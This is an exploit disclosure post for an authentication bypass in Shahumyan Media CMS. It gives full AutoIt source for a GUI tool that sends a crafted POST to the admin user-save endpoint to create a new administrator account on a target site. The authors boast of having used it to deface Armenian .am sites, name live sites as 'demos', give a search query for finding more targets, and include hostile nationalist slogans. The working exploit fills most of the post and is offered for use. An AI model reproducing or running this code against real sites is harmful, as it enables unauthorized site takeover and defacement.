======================================================== Vulnerable Software: Shahumyanmedia CMS 2010 Shahumyan Media Official site: http://shahumyanmedia.com/ ======================================================== First we want to say: it is not so widely used cms.Only .am (30-40) sites uses it. This cms also is commercial. This cms is prone to Authentication Bypass vulnerability and we used it to deface this .am sites.(BTW, nice 0day xD) But now we are going to 0day it and we will disclosure exploit for it which is written by us too as we promice to @itsec guy. ha ha ha)))))) The exploit is written in AutoIT programming/scripting language. *In some cases it may not work for you even target site vulnerable* This isn't our fault.It is due UDF called winhttp component a bit buggie) But it is really nice UDF. Anyways, if you want successfull exploitation use PPoE connection and it will work for you. You can find binary of exploit (32 bit and 64 bit) in archive + source code of exploit also included. On successfull exploitation it will add new administrative account to target site. We will also disclosure "Demo" sites to reproduce exploitation. ENjoy) /AkaStep & BOT_25 ======================================================== Source code of Exploit: NOTE: Exploit was tested on Win XP SP2 machine against real sites. Works for me like charm. Print screen 1: http://s017.radikal.ru/i434/1207/44/a3737fb99fab.png Print Screen 2: http://s56.radikal.ru/i151/1207/db/6916d93618a3.png =====================BEGIN============================== #NoTrayIcon #Region ;**** Directives created by AutoIt3Wrapper_GUI **** #AutoIt3Wrapper_Version=beta #AutoIt3Wrapper_Icon=best.ico #AutoIt3Wrapper_Outfile=shpoc32.exe #AutoIt3Wrapper_Outfile_x64=shpoc64.exe #AutoIt3Wrapper_UseUpx=n #AutoIt3Wrapper_Compile_Both=y #AutoIt3Wrapper_UseX64=y #AutoIt3Wrapper_Res_Comment=AkaStep & BOT_25 #AutoIt3Wrapper_Res_Description=AkaStep & BOT_25 #AutoIt3Wrapper_Res_Fileversion=3.1.6.1 #AutoIt3Wrapper_Res_LegalCopyright=AkaStep & BOT_25 #EndRegion ;**** Directives created by AutoIt3Wrapper_GUI **** #include <ButtonConstants.au3> #include <EditConstants.au3> #include <GUIConstantsEx.au3> #include <GuiStatusBar.au3> #include <StaticConstants.au3> #include <WindowsConstants.au3> #include "WinHttp.au3" #include <String.au3> #cs This Is a Private Exploit against shahumyanmedia cms. But for now after a lot of defacement of .am sites we think we can disclosure it. On success exploiting it will add new administrator to target site. Vuln type: Authentication Bypass. VUln anD Exploit Discovered By *AkaStep & BOT_25* Shoutz to All Azerbaijan Black Hatz! *Azerbaycana + Turk Qardaslarimiza Atesli Salamlar!* 23 July 2012 Demo 1: www.eurovision.am Demo 2: safecity.am And Google for " 2010 Shahumyan Media" admin page: eurovision.am/admin/ #ce $Form1 = GUICreate("shahumyanmedia cms Auth Bypass Exploit", 414, 292, -1, -1) GUISetBkColor(0x000000) $Input1 = GUICtrlCreateInput("0dayforyou", 184, 136, 137, 21) GUICtrlSetLimit(-1,30) $Input2 = GUICtrlCreateInput("0dayforyou", 184, 176, 137, 21) GUICtrlSetLimit(-1,30) $Label1 = GUICtrlCreateLabel("Username", 80, 136, 76, 25, $SS_CENTER) GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif") GUICtrlSetColor(-1, 0xFF0000) $Label2 = GUICtrlCreateLabel("Password", 80, 176, 74, 25, $SS_CENTER) GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif") GUICtrlSetColor(-1, 0xFF0000) $Exploit = GUICtrlCreateButton("Exploit", 24, 224, 153, 25) $Label3 = GUICtrlCreateLabel("Target Site", 80, 96, 88, 17) GUICtrlSetFont(-1, 10, 400, 0, "MS Sans Serif") GUICtrlSetColor(-1, 0xFF0000) $Input3 = GUICtrlCreateInput("site.tld", 184, 96, 137, 21) GUICtrlSetLimit(-1,30) $About = GUICtrlCreateButton("About", 224, 224, 177, 25) $StatusBar1 = _GUICtrlStatusBar_Create($Form1) _GUICtrlStatusBar_SetMinHeight($StatusBar1, 25) _GUICtrlStatusBar_SetText($StatusBar1,'Idle...') $Label4 = GUICtrlCreateLabel("0day From Azerbaijan Black Hatz", 24, 24, 362, 36, $SS_CENTER) GUICtrlSetFont(-1, 14, 400, 0, "MS Sans Serif") GUICtrlSetColor(-1, 0xFF0000) $Group1 = GUICtrlCreateGroup("", 8, 8, 401, 201) GUICtrlCreateGroup("", -99, -99, 1, 1) GUISetState(@SW_SHOW) While 1 $nMsg = GUIGetMsg() Switch $nMsg Case $GUI_EVENT_CLOSE $uzanmusdunda_niye_bele_tez_gedirsen=MsgBox(262209,"","Exit?") if $uzanmusdunda_niye_bele_tez_gedirsen=1 Then MsgBox(262208,"","Ok...Byee)",10) Exit EndIf Case $Exploit GUICtrlSetState($Exploit,$GUI_DISABLE) $askforuniquename=MsgBox(262209,"","Before Proceeding make Sure you are using Unique" & @CRLF & "and Not Existent User name on target site" & @CRLF & _ "Otherwise Exploit may fail for you" & @CRLF & _ "Are you Ready?") If $askforuniquename=1 Then _GUICtrlStatusBar_SetText($StatusBar1,'Working... Please Wait...') Sleep(Random(1000,1800,1)); # Some random sleep. $targetsite=GUICtrlRead($Input3) $adduser=GUICtrlRead($Input1) $addpass=GUICtrlRead($Input2) blackexploit($targetsite,$adduser,$addpass); passing it to function. Else GUICtrlSetState($Exploit,$GUI_ENABLE) EndIf Case $About GUICtrlSetState($About,$GUI_DISABLE) $creditstoAzerbaijan_blackhatz="This exploit Coded By AkaStep." & @CRLF & _ "The vulnerability Discovered By BOT_25~AkaStep" & @CRLF & "Hope You Will Enjoy while Using It) Meh Meh))))" & @CRLF & "Also Special Respect to My Bro CAMO." & @CRLF & ' WwW.ANTI-armenia.ORG ' MsgBox(262208,"",$creditstoAzerbaijan_blackhatz); GUICtrlSetState($About,$GUI_ENABLE) EndSwitch WEnd Func blackexploit($targetsite,$adduser,$addpass) _GUICtrlStatusBar_SetText($StatusBar1,'Opening Connection to Target Site... Please Wait...') Sleep(Random(1000,1800,1)); # Some random sleep. #cs Begin Send Data #ce $triggerforsuccess='{"result":1,"message":""}' $bad1='http://' $bad2='/' $targetsite=StringReplace(StringReplace($targetsite,$bad1,''),'/','');# Some CLeanup # Global $sAddress = $targetsite $rndstr=Random(156788111,54614128,1) & '@pipi.tld'; xD $rndmail=$rndstr ;~ Payload to add administrative user. ;~ # Global $sPostData = "username=" & $adduser & "&password=" &$addpass & "&email=" & $rndmail &"&user_type_id=1&firstname_en=" & $adduser & "&lastname_en=" & $adduser & "&secondname_en=" & $adduser & "&firstname_am=&lastname_am=&secondname_am=&firstname_ru=&lastname_ru=&secondname_ru=&user_id=0&x-technology=ajax" Global $hOpen = _WinHttpOpen("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.4) Gecko/20120122 Netscape6/6.2") Global $hConnect = _WinHttpConnect($hOpen, $sAddress) Global $hRequest = _WinHttpOpenRequest($hConnect, _ "POST", _ "admin/users/save", _ Default, _ Default, _ "application/json, text/javascript, */*") _WinHttpAddRequestHeaders($hRequest, "Accept-Language: en-us,en;q=0.5") _WinHttpAddRequestHeaders($hRequest, "Accept-Encoding: gzip, deflate") _WinHttpAddRequestHeaders($hRequest, "DNT: 1") _WinHttpAddRequestHeaders($hRequest, "Keep-Alive: 300") _WinHttpAddRequestHeaders($hRequest, "Connection: keep-alive") _WinHttpAddRequestHeaders($hRequest, "Content-Type: application/x-www-form-urlencoded; charset=UTF-8") _WinHttpAddRequestHeaders($hRequest, "X-Requested-With: XMLHttpRequest") _WinHttpSendRequest($hRequest, -1, $sPostData) _WinHttpReceiveResponse($hRequest) Global $sHeader, $sReturned If _WinHttpQueryDataAvailable($hRequest) Then $sHeader = _WinHttpQueryHeaders($hRequest) Do $sReturned &= _WinHttpReadData($hRequest) Until @error ;success or fail if StringInStr($sReturned,$triggerforsuccess) Then GUICtrlSetState($Exploit,$GUI_ENABLE) $tolog="Target Site is Vulnerable and exploiting of Vulnerability was Successfull!" & @CRLF & _ _StringRepeat('-',30) & @CRLF & _ 'Login Page: ' & $targetsite & '/admin/' & @CRLF & _ 'Your Administrative User: ' & $adduser & @CRLF & _ 'PassWord: ' & $addpass & @CRLF & _ _StringRepeat('-',30) & @CRLF & 'Enjoy:)' _GUICtrlStatusBar_SetText($StatusBar1,'Exploit Was Successfull!') Sleep(300); FileWrite(@ScriptDir & "\exploitlog.txt",@CRLF & $tolog & @CRLF) MsgBox(262208,"Exploited!", $tolog) _GUICtrlStatusBar_SetText($StatusBar1,'Idle...') Else GUICtrlSetState($Exploit,$GUI_ENABLE) _GUICtrlStatusBar_SetText($StatusBar1,'Exploit Failed...') MsgBox(262192,"Exploit Failed:(","Seems Target Site is not vulnerable..."); _GUICtrlStatusBar_SetText($StatusBar1,'Idle...') EndIf Else _GUICtrlStatusBar_SetText($StatusBar1,'WTF?') MsgBox(262192, "Error!", "No internet Connection or Incorrect Domain Name?.") _GUICtrlStatusBar_SetText($StatusBar1,'') GUICtrlSetState($Exploit,$GUI_ENABLE) EndIf _WinHttpCloseHandle($hRequest) _WinHttpCloseHandle($hConnect) _WinHttpCloseHandle($hOpen) #cs End SEND DATA #ce EndFunc; => blackexploit() =====================END OF============================ Binary && src you will find in attachment named: 0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip MD5 SUM: ======================================================= $ md5sum 0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip 4cb562fc1fa839e50ea8b6462967ea01 *0day_for_shahumyanmedia_cms_AUTH_BYPASS_POC.zip ======================================================= ********************* AZERBAIJAN BLACK HATZ*********************************** Of course we never forget our friends so, A BIG RESPECTS+THANKS TO ALL: =========================================================== packetstormsecurity.org packetstormsecurity.com packetstormsecurity.net securityfocus.com cxsecurity.com security.nnov.ru securtiyvulns.com securitylab.ru 1337day.com secunia.com securityhome.eu exploitsdownload.com exploit-db.com to all AA Team + to all Azerbaijan Black HatZ + *Especially to my bro CAMOUFL4G3.* =========================================================== Thanks & Respect! /AkaStep & BOT_25